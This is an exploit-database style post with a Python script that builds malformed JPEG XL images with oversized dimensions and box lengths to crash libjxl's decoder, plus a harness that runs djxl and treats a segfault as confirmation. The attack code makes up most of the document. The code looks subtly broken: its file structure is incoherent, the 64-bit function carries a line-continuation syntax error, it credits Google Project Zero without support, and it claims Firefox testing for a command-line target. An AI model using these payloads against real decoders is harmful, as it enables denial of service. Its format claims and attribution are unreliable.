=============================================================================================================================================
| # Title     : Libjxl Malicious Image Crafting Integer Overflow Generator                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://github.com/libjxl/libjxl/blob/main/lib/jxl/decode.cc                                                                |
=============================================================================================================================================

[+] Summary    : This Python script generates malicious JPEG XL (JXL) image files designed to test a potential Integer Overflow vulnerability in libjxl. 
                 The tool creates specially crafted JXL images with extremely large dimensions and manipulated headers that can trigger memory miscalculations when processed by vulnerable decoders.

[+] The script produces two proof-of-concept files:

poc32.jxl – targets 32-bit systems, using image dimensions (16384×16384) with RGBA float32 channels that theoretically require ~4 GB of memory, potentially causing integer overflow during allocation.

poc64.jxl – targets 64-bit systems, using extremely large dimensions (2³¹ × 2³⁰ pixels) to stress size calculations inside the decoder.

The generator builds a simplified JXL structure containing:

A valid JXL signature

A jxlc codestream box with an intentionally oversized length

A manipulated image header specifying excessive width, height, and channel configuration

Random padding to simulate image data

Additionally, the script includes a testing function that attempts to decode the generated file using the djxl tool from libjxl and checks for crashes such as SIGSEGV, which may indicate successful triggering of the vulnerability.

			  
[+] POC   : 


#!/usr/bin/env python3

import struct
import sys
import os

def generate_poc_32bit(filename="poc32.jxl"):
    """
    Generates a JXL image to exploit the vulnerability on 32-bit systems.
    Dimensions: 16384×16384 RGBA float32 (4*4*16384*16384 = 4GB)
    """
    print(f"[*] Generating {filename} for 32-bit systems...")

    jxl_data = bytearray(b'\xff\x0a') 

    box_size = 0xFFFFFFFF 
    box_type = b'jxlc'     
    codestream = bytearray([
        0x00, 0x00, 0x00, 0x0C,  
        0x4A, 0x58, 0x4C, 0x20, 
        0x00, 0x40, 0x00, 0x40, 
        0x04, 0x04,             
        0x00, 0x00,             

    ] + bytearray(os.urandom(1024))) 

    with open(filename, 'wb') as f:
        f.write(jxl_data)
        f.write(struct.pack('<I', box_size))
        f.write(box_type)
        f.write(codestream)
    
    print(f"[+] Successfully generated {filename}")
    return filename

def generate_poc_64bit(filename="poc64.jxl"):
    """
    Generates a JXL image to exploit the vulnerability on 64-bit systems.
    Maximum dimensions: 2^31 × 2^30 pixels
    """
    print(f"[*] Generating {filename} for 64-bit systems...")
    
    width = 0x80000000  
    height = 0x40000000 
    
    jxl_data = bytearray(b'\xff\x0a')
    

    codestream = struct.pack('<II', width, height) + \
                 struct.pack('<BB', 4, 32) + \  
                 bytearray(os.urandom(2048))
    
    with open(filename, 'wb') as f:
        f.write(jxl_data)
        f.write(struct.pack('<I', 0xFFFFFFFF))
        f.write(b'jxlc')
        f.write(codestream)
    
    print(f"[+] Successfully generated {filename}")
    return filename

def test_vulnerability(jxl_file, djxl_path="./djxl"):
    """
    Test the vulnerability on the target application.
    """
    import subprocess
    import time
    
    print(f"[*] Testing {jxl_file} on {djxl_path}...")
    
    try:

        start = time.time()
        result = subprocess.run([djxl_path, jxl_file, "--disable_output"], 
                                 capture_output=True, timeout=10)
        end = time.time()
        
        if result.returncode == -11:  
            print("[!] Vulnerability Confirmed: Segmentation Fault!")
            return True
        else:
            print(f"[-] Vulnerability not exploited: {result.returncode}")
            return False
            
    except subprocess.TimeoutExpired:
        print("[!] Application did not respond (maybe crash?)")
        return True
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

def main():
    print("="*60)
    print("JXL Integer Overflow PoC Generator")
    print("Google Project Zero - Vulnerability Report")
    print("="*60)

    poc32 = generate_poc_32bit()
    poc64 = generate_poc_64bit()
    
    print(f"\n[*] Created Files:")
    print(f"    - {poc32} (32-bit exploit)")
    print(f"    - {poc64} (64-bit exploit)")
    
    print(f"\n[*] To Test:")
    print(f"    $ ./build-i686/tools/djxl {poc32} --disable_output")
    print(f"    $ ./djxl {poc64} --disable_output")
    
if __name__ == "__main__":
    main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================